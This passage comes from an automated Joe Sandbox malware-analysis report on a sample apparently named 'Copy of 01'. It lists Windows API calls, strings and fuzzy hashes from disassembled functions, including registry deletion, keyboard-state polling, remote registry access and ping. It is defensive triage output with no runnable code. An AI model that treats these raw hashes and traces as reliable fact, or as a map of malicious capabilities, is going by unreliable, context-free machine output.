                        • Instruction ID: 67e0d47ec28dfcf9665c95966379efb694eab1354ccf75ba46f845ddaed42042
                        • Opcode Fuzzy Hash: d18f318410fc90f8e61f625d9e0d6cfbf01247483632849f57e5f22fb4b68c51
                        • Instruction Fuzzy Hash: 71413332940204BAEB17AB748C47FFF77ACEF46751F14046AF904EA192EB74AD0187A4
                        APIs
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 003BCC64
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 003BCC8D
                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 003BCD48
                          • Part of subcall function 003BCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 003BCCAA
                          • Part of subcall function 003BCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 003BCCBD
                          • Part of subcall function 003BCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003BCCCF
                          • Part of subcall function 003BCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 003BCD05
                          • Part of subcall function 003BCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 003BCD28
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 003BCCF3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 2734957052-4033151799
                        • Opcode ID: 79634a6c6e22e14e546e98f3014191d0ce55a44d14f00d2020aead9a063b073f
                        • Instruction ID: a43ffb52aa72931739b60d47447d44d2582763403a39ff6c64ac50f65ac4f65f
                        • Opcode Fuzzy Hash: 79634a6c6e22e14e546e98f3014191d0ce55a44d14f00d2020aead9a063b073f
                        • Instruction Fuzzy Hash: 7C31A075911129BBD7328B51DC88EFFBB7CEF51744F001169EA0AE2100D6309A46DBA0
                        APIs
                        • timeGetTime.WINMM ref: 0039E6B4
                          • Part of subcall function 0034E551: timeGetTime.WINMM(?,?,0039E6D4), ref: 0034E555
                        • Sleep.KERNEL32(0000000A), ref: 0039E6E1
                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0039E705
                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0039E727
                        • SetActiveWindow.USER32 ref: 0039E746
                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0039E754
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0039E773
                        • Sleep.KERNEL32(000000FA), ref: 0039E77E
                        • IsWindow.USER32 ref: 0039E78A
                        • EndDialog.USER32(00000000), ref: 0039E79B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                        • String ID: BUTTON
                        • API String ID: 1194449130-3405671355
                        • Opcode ID: be737da9fb929e383571a955436125f0c82f3ae6c695beee5843a908c82b4f26
                        • Instruction ID: ebb1aa120ed037245db8b26b3c5e69ffd9e376789b486543b344a98aa56c72f4
                        • Opcode Fuzzy Hash: be737da9fb929e383571a955436125f0c82f3ae6c695beee5843a908c82b4f26
                        • Instruction Fuzzy Hash: EE2150B0210205AFFF03AF61EE8DE253B6DF755748F181834F915E15A1DBB2AC408B19
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0039EA5D
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0039EA73
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0039EA84
                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0039EA96
                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0039EAA7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: SendString$_wcslen
                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                        • API String ID: 2420728520-1007645807
                        • Opcode ID: 7af52402bff7cbbd550038b61d434d240f5be0d11ed818a6f214b1214d44723a
                        • Instruction ID: 18d869fd9af7cc97c36932f1d242e6ef5431f4344e293f3f38239a94e9d51967
                        • Opcode Fuzzy Hash: 7af52402bff7cbbd550038b61d434d240f5be0d11ed818a6f214b1214d44723a
                        • Instruction Fuzzy Hash: 84117331A9025D79EB22E7A1DC8AEFF6A7CEBD1B00F404429F501A60E1EFB05D05C6B0
                        APIs
                        • GetDlgItem.USER32(?,00000001), ref: 00395CE2
                        • GetWindowRect.USER32(00000000,?), ref: 00395CFB
                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00395D59
                        • GetDlgItem.USER32(?,00000002), ref: 00395D69
                        • GetWindowRect.USER32(00000000,?), ref: 00395D7B
                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00395DCF
                        • GetDlgItem.USER32(?,000003E9), ref: 00395DDD
                        • GetWindowRect.USER32(00000000,?), ref: 00395DEF
                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00395E31
                        • GetDlgItem.USER32(?,000003EA), ref: 00395E44
                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00395E5A
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00395E67
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$ItemMoveRect$Invalidate
                        • String ID:
                        • API String ID: 3096461208-0
                        • Opcode ID: bbbb8b30795dc8d805294a2373fde12f5eb007d78286525bd5acc2dfcad9a973
                        • Instruction ID: c04fe0b5d07e128d35d6adc3ca1b8750af2a824d7ed06abfefab392f042b5ac9
                        • Opcode Fuzzy Hash: bbbb8b30795dc8d805294a2373fde12f5eb007d78286525bd5acc2dfcad9a973
                        • Instruction Fuzzy Hash: 2F512DB1B10605AFDF19DF68CD89EAEBBB9FB48300F148129F519E6290D770AE40CB50
                        APIs
                          • Part of subcall function 00348F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00348BE8,?,00000000,?,?,?,?,00348BBA,00000000,?), ref: 00348FC5
                        • DestroyWindow.USER32(?), ref: 00348C81
                        • KillTimer.USER32(00000000,?,?,?,?,00348BBA,00000000,?), ref: 00348D1B
                        • DestroyAcceleratorTable.USER32(00000000), ref: 00386973
                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00348BBA,00000000,?), ref: 003869A1
                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00348BBA,00000000,?), ref: 003869B8
                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00348BBA,00000000), ref: 003869D4
                        • DeleteObject.GDI32(00000000), ref: 003869E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                        • String ID:
                        • API String ID: 641708696-0
                        • Opcode ID: 4a9aebc986ef8dc2a303b0086e883644fab3776a2c94a49019d18cd8acee7a59
                        • Instruction ID: 8e0e7c5f1bcc7f64df366fd208e21300ea2487ed63d62ca343bf45ee07faaff3
                        • Opcode Fuzzy Hash: 4a9aebc986ef8dc2a303b0086e883644fab3776a2c94a49019d18cd8acee7a59
                        • Instruction Fuzzy Hash: 36617871502710DFCB27AF14DA89B29B7F5FB40312F159568E046AA9B0CB35BD90CF94
                        APIs
                          • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
                        • GetSysColor.USER32(0000000F), ref: 00349862
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ColorLongWindow
                        • String ID:
                        • API String ID: 259745315-0
                        • Opcode ID: 9320c48d443e5b82404dbade91b60119ed4079fa97096230c6f5663ba2c6469e
                        • Instruction ID: cea4c19b6bb1628bbceae7e752306fff377673fdf6d883762f4029431c03b37b
                        • Opcode Fuzzy Hash: 9320c48d443e5b82404dbade91b60119ed4079fa97096230c6f5663ba2c6469e
                        • Instruction Fuzzy Hash: A34185311046409FDB225F3D9C44FBA37E9AB46330F294656F9A68B1E1D731EC42DB10
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0037F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00399717
                        • LoadStringW.USER32(00000000,?,0037F7F8,00000001), ref: 00399720
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0037F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00399742
                        • LoadStringW.USER32(00000000,?,0037F7F8,00000001), ref: 00399745
                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00399866
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString$Message_wcslen
                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                        • API String ID: 747408836-2268648507
                        • Opcode ID: a77d6fc594b57b4905aa7d3ea5f24b5626677e96dac756ef37af0ef58e1ca77a
                        • Instruction ID: d8199f90e3e5e1f3f5981dc8fe3aa7bbf71795182e6faa6172313a7aeed73516
                        • Opcode Fuzzy Hash: a77d6fc594b57b4905aa7d3ea5f24b5626677e96dac756ef37af0ef58e1ca77a
                        • Instruction Fuzzy Hash: 76414072904109AACF06FBE4CE86EEE737CAF55340F10406AF6057A092EB756F48CB61
                        APIs
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003907A2
                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003907BE
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003907DA
                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00390804
                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0039082C
                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00390837
                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0039083C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                        • API String ID: 323675364-22481851
                        • Opcode ID: e57c1433d0dba7a52a9ac717bf690938220e184be316cd02c42104f773c0c76c
                        • Instruction ID: 18d130fdfe1bfb7c468a31f999b82813247d0794c837a29c3d65f25f6f1ac539
                        • Opcode Fuzzy Hash: e57c1433d0dba7a52a9ac717bf690938220e184be316cd02c42104f773c0c76c
                        • Instruction Fuzzy Hash: DD411672D10229AFCF16EBA4DC95DEEB778BF44350F058169E905A7160EB70AE04CBA0
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 003B3C5C
                        • CoInitialize.OLE32(00000000), ref: 003B3C8A
                        • CoUninitialize.OLE32 ref: 003B3C94
                        • _wcslen.LIBCMT ref: 003B3D2D
                        • GetRunningObjectTable.OLE32(00000000,?), ref: 003B3DB1
                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 003B3ED5
                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 003B3F0E
                        • CoGetObject.OLE32(?,00000000,003CFB98,?), ref: 003B3F2D
                        • SetErrorMode.KERNEL32(00000000), ref: 003B3F40
                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003B3FC4
                        • VariantClear.OLEAUT32(?), ref: 003B3FD8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                        • String ID:
                        • API String ID: 429561992-0
                        • Opcode ID: a1f1cdc8e3faf352e59a46e82ed33d5fc63a7b0f14f99c76fd91d4e4ffd6cf5e
                        • Instruction ID: 78cd39ea43c748729d74e0037ada10ea9b5b5c83eae1a73bdcefa253f2ea7bc5
                        • Opcode Fuzzy Hash: a1f1cdc8e3faf352e59a46e82ed33d5fc63a7b0f14f99c76fd91d4e4ffd6cf5e
                        • Instruction Fuzzy Hash: 4AC133716083159FD702DF68C88496BBBE9FF89748F14491DFA8A9B610DB30EE05CB52
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 003A7AF3
                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003A7B8F
                        • SHGetDesktopFolder.SHELL32(?), ref: 003A7BA3
                        • CoCreateInstance.OLE32(003CFD08,00000000,00000001,003F6E6C,?), ref: 003A7BEF
                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003A7C74
                        • CoTaskMemFree.OLE32(?,?), ref: 003A7CCC
                        • SHBrowseForFolderW.SHELL32(?), ref: 003A7D57
                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003A7D7A
                        • CoTaskMemFree.OLE32(00000000), ref: 003A7D81
                        • CoTaskMemFree.OLE32(00000000), ref: 003A7DD6
                        • CoUninitialize.OLE32 ref: 003A7DDC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                        • String ID:
                        • API String ID: 2762341140-0
                        • Opcode ID: cba3aa71db2b0135ac81aeb917474b251eae56e4660ab35ffaeca5ec3a69dfb4
                        • Instruction ID: 8e061cccada9b1a6df678ac32e7a08089a3db931223882e89ea4a05acd496960
                        • Opcode Fuzzy Hash: cba3aa71db2b0135ac81aeb917474b251eae56e4660ab35ffaeca5ec3a69dfb4
                        • Instruction Fuzzy Hash: A0C11975A04209AFDB15DF64C8C8DAEBBB9FF49314F148499E81ADB261DB30ED41CB90
                        APIs
                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003C5504
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C5515
                        • CharNextW.USER32(00000158), ref: 003C5544
                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003C5585
                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003C559B
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C55AC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$CharNext
                        • String ID:
                        • API String ID: 1350042424-0
                        • Opcode ID: f21112e81912598c437ed54f0767f0a3d534810b190190dca693c82580fb77c0
                        • Instruction ID: 626ba5d3d33078b0fa81ff6e589171cba67c51633fc7029a6b8baa7bfa8fd69c
                        • Opcode Fuzzy Hash: f21112e81912598c437ed54f0767f0a3d534810b190190dca693c82580fb77c0
                        • Instruction Fuzzy Hash: 64619C31904608ABDF129F55CC84EFE7BBDEB0A321F148149F925EA291D774AEC0DB60
                        APIs
                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0038FAAF
                        • SafeArrayAllocData.OLEAUT32(?), ref: 0038FB08
                        • VariantInit.OLEAUT32(?), ref: 0038FB1A
                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0038FB3A
                        • VariantCopy.OLEAUT32(?,?), ref: 0038FB8D
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 0038FBA1
                        • VariantClear.OLEAUT32(?), ref: 0038FBB6
                        • SafeArrayDestroyData.OLEAUT32(?), ref: 0038FBC3
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0038FBCC
                        • VariantClear.OLEAUT32(?), ref: 0038FBDE
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0038FBE9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                        • String ID:
                        • API String ID: 2706829360-0
                        • Opcode ID: fea73892ba9267a2ac5d0ae0923b9df779f6ee6516a61563f6f1157ac6b67fc6
                        • Instruction ID: a8036d78228577713be62477fbfec92dc105e5df2a0807285849826922621b11
                        • Opcode Fuzzy Hash: fea73892ba9267a2ac5d0ae0923b9df779f6ee6516a61563f6f1157ac6b67fc6
                        • Instruction Fuzzy Hash: FF414035A102199FCF06EF65C854DAEBBB9FF48354F008069E94AEB261DB34A945CF90
                        APIs
                        • GetKeyboardState.USER32(?), ref: 00399CA1
                        • GetAsyncKeyState.USER32(000000A0), ref: 00399D22
                        • GetKeyState.USER32(000000A0), ref: 00399D3D
                        • GetAsyncKeyState.USER32(000000A1), ref: 00399D57
                        • GetKeyState.USER32(000000A1), ref: 00399D6C
                        • GetAsyncKeyState.USER32(00000011), ref: 00399D84
                        • GetKeyState.USER32(00000011), ref: 00399D96
                        • GetAsyncKeyState.USER32(00000012), ref: 00399DAE
                        • GetKeyState.USER32(00000012), ref: 00399DC0
                        • GetAsyncKeyState.USER32(0000005B), ref: 00399DD8
                        • GetKeyState.USER32(0000005B), ref: 00399DEA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: b98c7967782f442c2b3fded549523d997c5d185dd8961d8226728cbadfeea2cf
                        • Instruction ID: 2b3450c2721d428efbef5f0b450f49eb4270e5d2071ee807e3c20b32c77d21a1
                        • Opcode Fuzzy Hash: b98c7967782f442c2b3fded549523d997c5d185dd8961d8226728cbadfeea2cf
                        • Instruction Fuzzy Hash: 7E41E7349047C96DFF33876988447B5BEA06F12344F09805FDAC6565C2EBA5ADC8CBA2
                        APIs
                        • WSAStartup.WSOCK32(00000101,?), ref: 003B05BC
                        • inet_addr.WSOCK32(?), ref: 003B061C
                        • gethostbyname.WSOCK32(?), ref: 003B0628
                        • IcmpCreateFile.IPHLPAPI ref: 003B0636
                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003B06C6
                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003B06E5
                        • IcmpCloseHandle.IPHLPAPI(?), ref: 003B07B9
                        • WSACleanup.WSOCK32 ref: 003B07BF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                        • String ID: Ping
                        • API String ID: 1028309954-2246546115
                        • Opcode ID: f48b625623c4af0d2e459b1038de70fac2aa130328f0188bccee5651afca8417
                        • Instruction ID: 6d2aa10958ee4f5f17ef04fcb883f46f0e2eb050c562e85890404565c9fdad84
                        • Opcode Fuzzy Hash: f48b625623c4af0d2e459b1038de70fac2aa130328f0188bccee5651afca8417
                        • Instruction Fuzzy Hash: 86918C356082019FD326DF15C889F5ABBE4EF44318F1985A9E5698FAA2CB30FD41CF81
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
